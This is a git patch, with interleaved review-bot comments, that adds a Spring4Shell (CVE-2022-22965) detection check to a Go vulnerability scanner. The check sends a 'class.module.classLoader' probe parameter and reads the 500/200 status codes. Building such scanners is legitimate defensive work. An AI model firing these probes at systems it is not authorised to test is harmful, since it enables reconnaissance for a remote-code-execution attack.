From ce9400835422b8d53a4af5e19c244c977c095a78 Mon Sep 17 00:00:00 2001
From: xx
Date: Fri, 8 Apr 2022 11:38:19 +0800
Subject: [PATCH] Spring4Shell
---
 brute/filefuzz.go | 4 +++-
 pocs_go/Springboot/CVE-2022-22965.go | 18 ++++++++++++++++++
 pocs_go/go_poc_check.go | 4 ++++
 3 files changed, 25 insertions(+), 1 deletion(-)
 create mode 100644 pocs_go/Springboot/CVE-2022-22965.go
diff --git a/brute/filefuzz.go b/brute/filefuzz.go
index c6872d87..e6673696 100644
--- a/brute/filefuzz.go
+++ b/brute/filefuzz.go
@@ -36,7 +36,9 @@ func reqPage(u string) (*page, *pkg.Response, error) {
 method = "HEAD"
 }
 }
- if req, err := pkg.HttpRequset(u, method, "", false, nil); err == nil {
+ header := make(map[string]string)
+ header["Accept"] = "text/html,*/*;"
+ if req, err := pkg.HttpRequset(u, method, "", false, header); err == nil {
 if pkg.IntInSlice(req.StatusCode, []int{301, 302, 307, 308}) {
 page.is302 = true
 }
diff --git a/pocs_go/Springboot/CVE-2022-22965.go b/pocs_go/Springboot/CVE-2022-22965.go
new file mode 100644
index 00000000..1fbfadcb
--- /dev/null
+++ b/pocs_go/Springboot/CVE-2022-22965.go
@@ -0,0 +1,18 @@
+package Springboot
+
+import (
+ "github.com/veo/vscan/pkg"
+)
+
+func CVE_2022_22965(u string) bool {
+ if req, err := pkg.HttpRequset(u+"?class.module.classLoader%5b1%5d=1", "GET", "", false, nil); err == nil {
+ if req.StatusCode == 500 {
+ if req2, err := pkg.HttpRequset(u+"?class.module.classLoader=1", "GET", "", false, nil); err == nil {
+ if req2.StatusCode == 200 {
+ return true
+ }
+ }
+ }
+ }
+ return false
+}
diff --git a/pocs_go/go_poc_check.go b/pocs_go/go_poc_check.go
index 01f79595..7f930292 100644
--- a/pocs_go/go_poc_check.go
+++ b/pocs_go/go_poc_check.go
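Review bot: The Accept value `"text/html,*/*;"` added in the filefuzz.go hunk ends with a bare `;`, which leaves an empty parameter after `*/*` and is not a well-formed media range; a strict server or proxy may ignore or reject the header, so either drop the semicolon or give it a real parameter, `header["Accept"] = "text/html,*/*;q=0.8"`. The make-then-assign pair could also be a single composite literal, `header := map[string]string{"Accept": "text/html,*/*;q=0.8"}`. reqPage begins before this hunk and continues past it.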
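Review bot: Both probe URLs in CVE_2022_22965 are built with `u+"?..."`, so a target URL that already carries a query string receives a second `?` and the classLoader parameter is no longer parsed as a parameter; pick the separator once and reuse it in both requests (this needs a `strings` import). The exported function also has no doc comment, and since the result rests only on a 500-then-200 status pair it should say so, e.g. `// CVE_2022_22965 reports whether u appears to bind the class.module.classLoader property; the 500/200 status heuristic can misfire on endpoints that error on any unexpected indexed parameter.` The inner `err` shadows the outer one, which is harmless here but reads confusingly next to `req2`; `err2` would match.
```go
func CVE_2022_22965(u string) bool {
	// Keep the probe parameter valid when u already carries a query string.
	sep := "?"
	if strings.Contains(u, "?") {
		sep = "&"
	}
	if req, err := pkg.HttpRequset(u+sep+"class.module.classLoader%5b1%5d=1", "GET", "", false, nil); err == nil {
		if req.StatusCode == 500 {
			if req2, err2 := pkg.HttpRequset(u+sep+"class.module.classLoader=1", "GET", "", false, nil); err2 == nil {
				// … unchanged: status check and return …
```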
@@ -172,6 +172,10 @@ func POCcheck(wappalyzertechnologies []string, URL string, finalURL string) []st
 if zabbix.CVE_2022_23131(URL) {
 technologies = append(technologies, "exp-ZabbixSAML|bypass-login")
 }
+ case "Spring":
+ if Springboot.CVE_2022_22965(finalURL) {
+ technologies = append(technologies, "exp-Spring4Shell|CVE_2022_22965")
+ }
 case "SpringGateway":
 if Springboot.CVE_2022_22947(URL) {
 technologies = append(technologies, "exp-SpringGateway|CVE_2022_22947")
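Review bot: The new `case "Spring":` passes `finalURL` to the check while every neighbouring case in this hunk passes `URL`, and nothing in the hunk explains the difference; if it is deliberate (probing the post-redirect page rather than the entry URL), a one-line comment would stop a later maintainer from "fixing" it, e.g. `// finalURL: the Spring probe must hit the page reached after redirects, not the entry URL`. If it is not deliberate, it should be `URL` for consistency with the sibling cases. POCcheck starts and ends outside this hunk.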